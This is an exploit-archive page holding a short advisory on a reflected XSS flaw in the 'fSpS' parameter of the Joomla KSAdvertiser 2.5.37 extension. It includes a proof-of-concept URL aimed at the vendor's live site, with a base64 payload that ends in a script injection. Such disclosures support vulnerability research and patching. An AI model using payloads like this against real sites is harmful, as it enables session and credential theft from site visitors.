Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]
Change Mirror[11] Download[12]
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Exploits ] ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr :
│ Website : extensions.joomla.org │
│ Vendor : Heiner Klostermann - kiss-software.de │
│ Software : Joomla KSAdvertiser 2.5.37 │
│ Vuln Type: Reflected XSS │
│ Method : GET │
│ Impact : Manipulate the content of the site │
│ │
│────────────────────────────────────────────────────────────────────────────────────────│
│ B4nks-NET irc.b4nks.tk #unix ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ The attacker can send to victim a link containing a malicious URL in an email or │
│ instant message can perform a wide variety of actions, such as stealing the victim's │
│ session token or login credentials │
│ │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Greets:
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL
CryptoJob (Twitter) twitter.com/CryptozJob
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2022 ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Path: /index.php
GET parameter 'fSpS' is vulnerable to XSS
https://www.kiss-software.de/index.php?option=com_ksadvertiser&view=items&Itemid=0&filtercat=50&fSpS=KGNjLmlkID0gNTAgT1IgY2MucGFyZW50X2lkID0gNTApfChhLml0X2lkZW50PScxJyBPUiBhLml0X3Bob25ldGljIExJS0UgJyUxJScpfChhLnRpdGxlPScyJyBPUiBhLml0X3Bob25ldGljIExJS0UgJyUyJScpfChhLml0X2ludHJvPSczJyBPUiBhLml0X3Bob25ldGljIExJS0UgJyUzJScpfCgoYS5pdF9hZGRyZXNzPSc0JyBPUiBhLml0X3Bob25ldGljIExJS0UgJyU0JScpIEFORCBhLml0X2JveG51bWJlciA9IDApfCgoYS5pdF9wb3N0Y29kZT0nNScgT1IgYS5pdF9waG9uZXRpYyBMSUtFICclNSUnKSBBTkQgYS5pdF9ib3hudW1iZXIgPSAwKXwoKGEuaXRfY2l0eT0nNicgT1IgYS5pdF9waG9uZXRpYyBMSUtFICclNiUnKSBBTkQgYS5pdF9ib3hudW1iZXIgPSAwKWg1bjZsPHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0PmlyYzdu&lang=en
[-] Done
File Tags
- ActiveX[17] (932)
- Advisory[18] (78,336)
- Arbitrary[19] (15,297)
- BBS[20] (2,859)
- Bypass[21] (1,599)
- CGI[22] (1,013)
- Code Execution[23] (6,786)
- Conference[24] (671)
- Cracker[25] (799)
- CSRF[26] (3,277)
- DoS[27] (22,092)
- Encryption[28] (2,341)
- Exploit[29] (50,173)
- File Inclusion[30] (4,160)
- File Upload[31] (945)
- Firewall[32] (821)
- Info Disclosure[33] (2,565)
- Intrusion Detection[34] (862)
- Java[35] (2,829)
- JavaScript[36] (808)
- Kernel[37] (6,166)
- Local[38] (14,103)
- Magazine[39] (586)
- Overflow[40] (12,254)
- Perl[41] (1,413)
- PHP[42] (5,059)
- Proof of Concept[43] (2,284)
- Protocol[44] (3,366)
- Python[45] (1,409)
- Remote[46] (29,885)
- Root[47] (3,468)
- Ruby[48] (581)
- Scanner[49] (1,631)
- Security Tool[50] (7,744)
- Shell[51] (3,079)
- Shellcode[52] (1,204)
- Sniffer[53] (884)
- Spoof[54] (2,123)
- SQL Injection[55] (16,066)
- TCP[56] (2,370)
- Trojan[57] (682)
- UDP[58] (873)
- Virus[59] (660)
- Vulnerability[60] (30,677)
- Web[61] (9,123)
- Whitepaper[62] (3,723)
- x86[63] (944)
- XSS[64] (17,420)
- Other[65]
File Archives
- October 2022[66]
- September 2022[67]
- August 2022[68]
- July 2022[69]
- June 2022[70]
- May 2022[71]
- April 2022[72]
- March 2022[73]
- February 2022[74]
- January 2022[75]
- December 2021[76]
- November 2021[77]
- Older[78]
Systems
- AIX[79] (426)
- Apple[80] (1,899)
- BSD[81] (369)
- CentOS[82] (55)
- Cisco[83] (1,915)
- Debian[84] (5,948)
- Fedora[85] (1,690)
- FreeBSD[86] (1,242)
- Gentoo[87] (4,219)
- HPUX[88] (878)
- iOS[89] (323)
- iPhone[90] (108)
- IRIX[91] (220)
- Juniper[92] (67)
- Linux[93] (42,987)
- Mac OS X[94] (684)
- Mandriva[95] (3,105)
- NetBSD[96] (255)
- OpenBSD[97] (479)
- RedHat[98] (12,038)
- Slackware[99] (941)
- Solaris[100] (1,607)
- SUSE[101] (1,444)
- Ubuntu[102] (8,046)
- UNIX[103] (9,122)
- UnixWare[104] (185)
- Windows[105] (6,477)
- Other[106]